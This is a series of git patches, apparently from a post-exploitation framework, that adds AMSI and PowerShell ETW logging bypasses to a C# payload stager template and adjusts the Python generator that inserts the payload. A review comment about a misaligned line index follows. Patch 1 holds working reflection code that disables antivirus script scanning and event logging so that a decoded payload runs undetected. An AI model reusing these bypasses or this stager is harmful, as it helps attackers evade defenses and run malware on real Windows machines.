From e9a3726e73135b126ec9f3d2e0df35169652d091 Mon Sep 17 00:00:00 2001
From: Philippe Pepos Petitclerc
Date: Sun, 14 Oct 2018 13:01:37 -0400
Subject: [PATCH 1/3] Add Amsi and SBL bypasses to the CSharp stager.

The bypasses are the same ones used in the powershell launcher.
---
 .../cSharpTemplateResources/cmd/cmd/Program.cs | 18 ++++++++++++++++++
 1 file changed, 18 insertions(+)

diff --git a/data/misc/cSharpTemplateResources/cmd/cmd/Program.cs b/data/misc/cSharpTemplateResources/cmd/cmd/Program.cs
index 72c55a9bd..d68e5e29f 100644
--- a/data/misc/cSharpTemplateResources/cmd/cmd/Program.cs
+++ b/data/misc/cSharpTemplateResources/cmd/cmd/Program.cs
@@ -8,6 +8,7 @@ */
 using System;
 using System.Text;
+using System.Reflection;
 using System.Management.Automation;
 using System.Management.Automation.Runspaces;
@@ -17,6 +18,8 @@ class Program
 {
 public static void Main(string[] args)
 {
+ BindingFlags flags = BindingFlags.NonPublic | BindingFlags.Static;
+
 string stager = " YOUR CODE GOES HERE";
 var decodedScript = Encoding.Unicode.GetString(Convert.FromBase64String(stager));
@@ -25,10 +28,25 @@ public static void Main(string[] args)
 RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace);
 Pipeline pipeline = runspace.CreatePipeline();
+ var PSEtwLogProvider = pipeline.Commands.GetType().Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider");
+ if (PSEtwLogProvider != null)
+ {
+ var EtwProvider = PSEtwLogProvider.GetField("etwProvider", flags);
+ var EventProvider = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid());
+ EtwProvider.SetValue(null, EventProvider);
+ }
+
+ var amsiUtils = pipeline.Commands.GetType().Assembly.GetType("System.Management.Automation.AmsiUtils");
+ if (amsiUtils != null)
+ {
+ amsiUtils.GetField("amsiInitFailed", flags).SetValue(null, true);
+ }
+
 pipeline.Commands.AddScript(decodedScript);
 pipeline.Commands.Add("Out-Default");
 pipeline.Invoke();
+
 }
 }
 }
From 187f187ec69ebc9e961677c384fd551e45f6a404 Mon Sep 17 00:00:00 2001
From: Philippe Pepos Petitclerc
Date: Sun, 14 Oct 2018 13:24:01 -0400
Subject: [PATCH 2/3] Adjust cs stager module for new template.

---
 lib/stagers/windows/csharp_exe.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/stagers/windows/csharp_exe.py b/lib/stagers/windows/csharp_exe.py
index 2c0b5d912..ab7bf1479 100644
--- a/lib/stagers/windows/csharp_exe.py
+++ b/lib/stagers/windows/csharp_exe.py
@@ -125,7 +125,7 @@ def generate(self):
 shutil.copytree(directory,destdirectory)
 lines = open(destdirectory + 'cmd/Program.cs').read().splitlines()
- lines[19] = "\t\t\tstring stager = \"" + launcherCode + "\";"
+ lines[17] = "\t\t\tstring stager = \"" + launcherCode + "\";"
 open(destdirectory + 'cmd/Program.cs','w').write('\n'.join(lines))
 shutil.make_archive(outfile,'zip',destdirectory)
 shutil.rmtree(destdirectory)

From 5590ea1db8a83d6e078efbb49c210cf55c423f2e Mon Sep 17 00:00:00 2001
From: Philippe Pepos Petitclerc
Date: Sun, 14 Oct 2018 13:03:13 -0400
Subject: [PATCH 3/3] Fix whitespaces/empty lines

---
 data/misc/cSharpTemplateResources/cmd/cmd/Program.cs | 10 ++--------
 1 file changed, 2 insertions(+), 8 deletions(-)

diff --git a/data/misc/cSharpTemplateResources/cmd/cmd/Program.cs b/data/misc/cSharpTemplateResources/cmd/cmd/Program.cs
index d68e5e29f..43adfbe6f 100644
--- a/data/misc/cSharpTemplateResources/cmd/cmd/Program.cs
+++ b/data/misc/cSharpTemplateResources/cmd/cmd/Program.cs
@@ -1,16 +1,11 @@
 /*
- *
 * You may compile this in Visual Studio or SharpDevelop etc.
- *
- *
- *
- *
 */
 using System;
 using System.Text;
 using System.Reflection;
-using System.Management.Automation;
-using System.Management.Automation.Runspaces;
+using System.Management.Automation;
+using System.Management.Automation.Runspaces;
 namespace cmd
 {
@@ -46,7 +41,6 @@ public static void Main(string[] args)
 pipeline.Commands.Add("Out-Default");
 pipeline.Invoke();
-
 }
 }
 }
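Review bot: The new index `lines[17]` in PATCH 2 is only correct once PATCH 3 has landed: by PATCH 1's second hunk header the `string stager` line sits at line 23 of the template, and it is PATCH 3's removal of five header lines that moves it to line 18 (index 17), so with the series applied in order the intermediate commit overwrites the class-opening brace instead of the placeholder. The commit timestamps suggest the patches were authored in the other order, which would explain the mismatch. A hard-coded line index is coupled to the template layout and will break again on the next whitespace edit; locating the placeholder by content removes that coupling, e.g. `idx = next(i for i, l in enumerate(lines) if 'string stager' in l)` followed by `lines[idx] = "\t\t\tstring stager = \"" + launcherCode + "\";"`. generate's body starts and ends outside the hunk.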